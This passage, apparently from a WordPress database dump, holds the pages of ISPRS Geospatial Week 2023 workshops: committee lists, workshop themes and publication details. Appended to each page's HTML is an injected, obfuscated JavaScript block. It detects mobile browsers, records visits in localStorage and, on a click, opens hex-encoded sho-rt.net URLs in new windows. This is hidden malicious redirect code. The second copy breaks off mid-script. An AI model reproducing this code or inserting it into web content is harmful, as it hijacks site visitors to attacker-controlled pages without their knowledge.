University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Selected papers:</u><u></u><u></u></h5>\n<h5>After the event, the authors of selected papers will be invited to submit the extended versions of their papers to the PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"color: blue;\" href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">https://www.springer.com/<wbr />journal/41064</a><a href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">)</a>; current impact factor: 3.292).</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-11-30 17:54:02','2022-11-30 17:54:02','',2586,'https://gsw2023.com/?p=3383',0,'revision','',0),
(3385,1,'2022-12-05 05:02:00','2022-12-05 05:02:00','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI Inc.,USA</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n<li>Alex Bruskin, Senticore Technologies LLC, USA<u></u><u></u></li>\n</ul>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 